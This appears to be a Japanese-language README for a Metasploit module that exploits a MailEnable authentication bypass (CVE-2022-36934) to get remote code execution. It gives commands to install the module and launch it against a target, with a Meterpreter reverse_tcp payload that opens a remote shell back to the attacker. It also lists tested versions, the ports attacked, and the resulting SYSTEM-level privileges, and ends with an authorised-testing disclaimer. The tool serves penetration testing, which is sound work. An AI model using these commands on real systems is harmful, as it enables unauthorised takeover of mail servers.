
MailEnable CVE-2022-36934 認証バイパス RCE 用 Metasploit モジュール
MailEnableの認証バイパス脆弱性(CVE-2022-36934)を突き、リモートコード実行に至らせるMetasploitモジュールです。
cp modules/exploits/windows/smtp/mailenable_authbypass_rce.rb /usr/share/metasploit-framework/modules/exploits/windows/smtp/
reload_all
use exploit/windows/smtp/mailenable_authbypass_rce set RHOSTS <target_ip> set LHOST <your_ip> set PAYLOAD windows/x64/meterpreter/reverse_tcp exploit
🎯 テスト済み環境:
MailEnable Professional 10.25 Windows Server 2019 MailEnable Enterprise 10.30 Windows Server 2016
📝 技術詳細:
Vulnerability: SMTP/POP3におけるSQLi類似構文による認証バイパス
Attack Vector: ネットワーク(ポート25/110)
Privileges: MailEnableサービスアカウントとして実行(多くの場合SYSTEM)
⚠️ 法的免責事項:
このツールは認可されたテスト専用です。所有していない、または明示的なテスト許可がないシステムに対しては絶対に使用しないでください。